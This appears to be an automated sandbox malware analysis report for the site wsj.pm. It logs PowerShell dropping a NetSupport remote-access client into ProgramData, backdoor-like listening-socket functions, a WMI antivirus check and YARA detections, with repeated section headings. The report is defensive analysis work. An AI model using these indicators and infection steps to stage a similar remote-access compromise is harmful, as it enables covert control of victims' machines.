Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\netsupport VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.3208.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\netsupport\client\client32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\netsupport\client\client32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\netsupport\client\client32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalCache\WSJ_4.12.77.0_x64__v3spfewvfazpe{cc5f9d8b-94e7-4e6d-8d7d-70b7a8e2a015}_temp.pri VolumeInformation
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_110F1070 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,

32_2_110F1070

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_1101D160 __time64,SetRect,GetLocalTime,

32_2_1101D160

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_1103B170 _calloc,GetUserNameA,_free,_calloc,_free,

32_2_1103B170

Source: C:\ProgramData\netsupport\client\client32.exe

32_2_11171199

Source: C:\ProgramData\netsupport\client\client32.exe

32_2_1109D240

AV process strings found (often used to terminate AV products)

Source: powershell.exe, 0000001A.00000002.2194762703.0000023179892000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : select * from AntiVirusProduct

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1106F200 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,	32_2_1106F200
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_110D5D90 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,	32_2_110D5D90
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEBA980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,	32_2_6BEBA980

Yara detected NetSupport remote tool

Source: Yara match	File source: 32.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.client32.exe.6c1b0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.client32.exe.74670000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.powershell.exe.23162f37328.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.powershell.exe.23162f2d0d8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.powershell.exe.2316336ecf8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.client32.exe.111b32a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.client32.exe.6beb0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.1941488421.00000000008BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2526275885.000000000270C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2542110346.0000000005AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2526275885.0000000002700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2540155172.0000000005A6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2487651963.0000000000602000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2496684032.0000000000827000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2544309699.0000000005AE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 7408, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\netsupport\client\PCICHEK.DLL, type: DROPPED
Source: Yara match	File source: C:\ProgramData\netsupport\client\pcicapi.dll, type: DROPPED
Source: Yara match	File source: C:\ProgramData\netsupport\client\client32.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\netsupport\client\HTCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\ProgramData\netsupport\client\AudioCapture.dll, type: DROPPED
Source: Yara match	File source: C:\ProgramData\netsupport\client\TCCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\ProgramData\netsupport\client\PCICL32.DLL, type: DROPPED

Windows Analysis Report
http://wsj.pm

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	1431705
Product:	CloudBasic
Start time:	16:57:45
Start date:	25.04.2024
Cookbook:	defaultwindowsinteractivecookbook.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS

Windows Analysis Report http://wsj.pm

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
http://wsj.pm